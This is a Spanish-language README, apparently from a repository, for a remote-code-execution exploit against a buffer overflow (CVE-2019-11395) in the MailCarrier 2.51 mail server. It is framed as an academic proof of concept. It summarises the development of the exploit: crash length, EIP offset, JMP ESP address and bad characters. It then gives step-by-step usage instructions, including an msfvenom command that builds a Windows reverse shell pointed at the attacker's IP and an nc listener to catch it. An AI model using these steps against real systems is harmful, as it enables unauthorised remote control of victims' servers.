
Un exploit para la vulnerabilidad CVE-2019-11395 en la aplicación de correo MailCarrier 2.51, que permite la ejecución remota de código.
La vulnerabilidad CVE-2019-11395 describe una vulnerabilidad de desbordamiento de búfer en la aplicación de correo electrónico MailCarrier 2.51, que permite la ejecución remota de código. La vulnerabilidad ocurre en los procesos SMTP RCPT TO, POP3 USER, POP3 LIST, POP3 TOP o POP3 RETR.
Durante el estudio académico, se centró la atención en los procesos POP3 para crear una Prueba de Concepto (PoC). Se identificó que el envío de 6000 bytes a la aplicación provoca que deje de funcionar, revelando así la vulnerabilidad de desbordamiento de búfer.
msf-pattern_create -l 6000 para identificar con precisión el EIP.msf-pattern_offset -q 6E47386E -l 6000, obteniendo un desplazamiento EIP de 5095.expsrv.dll con ASLR deshabilitado, adecuado para un JMP ESP.\x00\x0a\x0d durante las pruebas de caracteres inválidos.msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode.CVE-2019-11395.py para alojar el payload.nc -lnvp 4444 y se ejecutó el exploit (CVE-2019-11395.py) para obtener acceso al entorno y validar el CVE descrito.Sigue estos pasos para utilizar el exploit:
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode.msfvenom.CVE-2019-11395.py para reemplazar la variable shellcode con la salida obtenida del comando msfvenom.CVE-2019-11395.py) para obtener acceso al entorno y validar el CVE descrito.
Visita mi perfil en LinkedIn